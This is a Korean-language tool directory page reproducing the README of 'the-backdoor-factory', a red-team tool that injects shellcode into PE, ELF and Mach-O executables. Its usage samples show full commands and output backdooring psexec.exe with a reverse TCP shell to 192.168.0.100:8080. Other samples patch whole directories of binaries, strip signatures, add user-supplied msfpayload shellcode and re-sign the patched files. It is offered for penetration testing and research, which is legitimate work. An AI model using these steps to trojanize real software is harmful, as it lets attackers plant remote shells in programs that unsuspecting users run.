Skip to content
KitploitKITPLOIT
도구블로그
Log in
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

피드문의개인정보© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
the-backdoor-factory — 셸코드로 PE, ELF, Mach-O 바이너리를 패치합니다. 새 버전은 개발 중이며 스폰서에게만 제공됩니다. | Kitploit
도구/GitHubGitHub/secretsquirrel/the-backdoor-factory
ExploitationReverse EngineeringShellcodePost-ExploitationMalware AnalysisPenetration TestingRed TeamingPayload DevelopmentBinary Exploitation
GitHubsecretsquirrel/the-backdoor-factory

the-backdoor-factory

셸코드로 PE, ELF, Mach-O 바이너리를 패치합니다. 새 버전은 개발 중이며 스폰서에게만 제공됩니다.

3.4k774212년 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
저장소 보기웹사이트
공유

BACKDOOR FACTORY의 새 버전을 사용할 수 있습니다! 여기에서 액세스하세요: https://github.com/sponsors/secretsquirrel

경고: Pull Request는 무시되고 닫힙니다.

The Backdoor Factory (BDF)

보안 전문가와 연구자 전용입니다.

BDF의 목표는 사용자가 원하는 셸코드를 실행 가능한 바이너리에 패치하고 패치 전 상태의 정상적인 실행을 계속하는 것입니다.

Join the chat at https://gitter.im/secretsquirrel/the-backdoor-factory Black Hat Arsenal

Black Hat USA 2015:

Video: https://www.youtube.com/watch?v=OuyLzkG16Uk

Paper: https://www.blackhat.com/docs/us-15/materials/us-15-Pitts-Repurposing-OnionDuke-A-Single-Case-Study-Around-Reusing-Nation-State-Malware-wp.pdf

Shmoocon 2015:

Video: https://archive.org/details/joshpitts_shmoocon2015

Paper: https://www.dropbox.com/s/te7e35c8xcnyfzb/JoshPitts-UserlandPersistenceOnMacOSX.pdf

DerbyCon 2014:

Video: http://www.youtube.com/watch?v=LjUN9MACaTs

DerbyCon 2013:

Video: http://www.youtube.com/watch?v=jXLb2RNX5xs

Injection Module Demo: http://www.youtube.com/watch?v=04aJAex2o3U

Slides: http://www.slideshare.net/midnite_runr/patching-windows-executables-with-the-backdoor-factory

개발자에게 연락하려면:

IRC:
irc.freenode.net #BDFactory 

Twitter:
@midnite_runr

BSD 3-Clause License에 따라 배포됩니다.

위키를 참조하세요: https://github.com/secretsquirrel/the-backdoor-factory/wiki


설치

DOCKER

docker pull secretsquirrel/the-backdoor-factory
docker run -it secretsquirrel/the-backdoor-factory bash
# ./backdoor.py

###구식 방법

####의존성 #####OnionDuke를 사용하려면 반드시 Intel 머신이어야 합니다. aPLib는 아직 ARM 칩셋을 지원하지 않기 때문입니다.

Capstone engine은 PyPi에서 다음과 같이 설치할 수 있습니다:

sudo pip install capstone

Pefile, 최신 버전:

https://code.google.com/p/pefile/

osslsigncode (저장소에 포함됨):

http://sourceforge.net/p/osslsigncode/osslsigncode/ci/master/tree/

Kali 설치:

  apt-get update
  apt-get install backdoor-factory

기타 *NIX/MAC 설치:

./install.sh

이 스크립트는 pefile 설치를 위해 pip 3.01로 Capstone을 설치합니다.

업데이트:

./update.sh

지원 대상:

Windows PE x86/x64,ELF x86/x64 (System V, FreeBSD, ARM Little Endian x32), 
and Mach-O x86/x64 and those formats in FAT files

Packed Files: PE UPX x86/x64

Experimental: OpenBSD x32 

일부 실행 파일에는 기본 제공 보호 기능이 있으므로 이 도구는 모든 바이너리에서 작동하지 않습니다. 대상 바이너리를 고객에게 배포하거나 실습에 사용하기 전에 테스트하는 것이 좋습니다. NSIS 우회를 거의 구현해 가는 중이며, 이러한 검사 우회 기능은 향후 포함될 예정입니다.

Many thanks to Ryan O'Neill --ryan 'at' codeslum <d ot> org--
Without him, I would still be trying to do stupid things 
with the elf format.
Also thanks to Silvio Cesare with his 1998 paper 
(http://vxheaven.org/lib/vsc01.html) which these ELF patching
techniques are based on.

최근 많은 바이너리에서 테스트되었습니다.

./backdoor.py -h Usage: backdoor.py [options]


##기능:

###PE 파일

Can find all codecaves in an EXE/DLL.
By default, clears the pointer to the PE certificate table, thereby unsigning a binary.
Can inject shellcode into code caves or into a new section.
Can find if a PE binary needs to run with elevated privileges.
When selecting code caves, you can use the following commands:
  -Jump (j), for code cave jumping
  -Single (s), for patching all your shellcode into one cave
  -Append (a), for creating a code cave
  -Ignore (i or q), nevermind, ignore this binary
Can ignore DLLs
Import Table Patching
AutoPatching (-m automtic)
Onionduke (-m onionduke)

###ELF 파일

Extends 1000 bytes (in bytes) to the TEXT SEGMENT and injects shellcode into that section of code.

###Mach-O 파일 Pre-Text Section patching and signature removal

###전체

The user can :
  -Provide custom shellcode.
  -Patch a directory of executables/dlls.
  -Select x32 or x64 binaries to patch only.
  -Include BDF is other python projects see pebin.py and elfbin.py

샘플 사용법:

###기존 코드 케이브를 사용하여 exe/dll 패치하기:

./backdoor.py -f psexec.exe -H 192.168.0.100 -P 8080 -s reverse_shell_tcp 

[*] In the backdoor module
[*] Checking if binary is supported
[*] Gathering file info
[*] Reading win32 entry instructions
[*] Looking for and setting selected shellcode
[*] Creating win32 resume execution stub
[*] Looking for caves that will fit the minimum shellcode length of 402
[*] All caves lengths:  (402,)
############################################################
The following caves can be used to inject code and possibly
continue execution.
**Don't like what you see? Use jump, single, append, or ignore.**
############################################################
[*] Cave 1 length as int: 402
[*] Available caves:
1. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2e4d5 End: 0x2e6d0; Cave Size: 507
2. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2e6e9 End: 0x2e8d5; Cave Size: 492
3. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2e8e3 End: 0x2ead8; Cave Size: 501
4. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2eaf1 End: 0x2ecdd; Cave Size: 492
5. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2ece7 End: 0x2eee0; Cave Size: 505
6. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2eef3 End: 0x2f0e5; Cave Size: 498
7. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2f0fb End: 0x2f2ea; Cave Size: 495
8. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2f2ff End: 0x2f4f8; Cave Size: 505
9. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2f571 End: 0x2f7a0; Cave Size: 559
10. Section Name: .rsrc; Section Begin: 0x30600 End: 0x5f200; Cave begin: 0x5b239 End: 0x5b468; Cave Size: 559
**************************************************
[!] Enter your selection: 5
Using selection: 5
[*] Changing Section Flags
[*] Patching initial entry instructions
[*] Creating win32 resume execution stub
[*] Overwriting certificate table pointer
[*] psexec.exe backdooring complete
File psexec.exe is in the 'backdoored' directory

###코드 섹션을 추가하여 exe/dll 패치하기:

./backdoor.py -f psexec.exe -H 192.168.0.100 -P 8080 -s reverse_shell_tcp -a 
[*] In the backdoor module
[*] Checking if binary is supported
[*] Gathering file info
[*] Reading win32 entry instructions
[*] Looking for and setting selected shellcode
[*] Creating win32 resume execution stub
[*] Creating Code Cave
- Adding a new section to the exe/dll for shellcode injection
[*] Patching initial entry instructions
[*] Creating win32 resume execution stub
[*] Overwriting certificate table pointer
[*] psexec.exe backdooring complete
File psexec.exe is in the 'backdoored' directory

###exe 디렉토리 패치하기: ./backdoor.py -d test/ -i 192.168.0.100 -p 8080 -s reverse_shell_tcp -a ...output too long for README...


###사용자 제공 셸코드: msfpayload windows/exec CMD='calc.exe' R > calc.bin ./backdoor.py -f psexec.exe -s user_supplied_shellcode -U calc.bin This will pop calc.exe on a target windows workstation. So 1337. Much pwn. Wow.


###PE 코드 서명

BDF는 코드 서명 인증서가 있으면 PE 파일에 서명할 수 있습니다. osslsigncode를 사용합니다.

서명 인증서와 개인 키를 certs/ 디렉토리에 넣으세요. 이 블로그 게시물의 openssl 명령을 사용하여 인증서를 준비하세요: http://secureallthethings.blogspot.com/2015/12/add-pe-code-signing-to-backdoor-factory.html

개인 키 비밀번호를 파일에 다음과 같이 (정확히 다음과 같이) 넣으세요:

echo -n yourpassword > certs/passFile.txt
도구 다운로드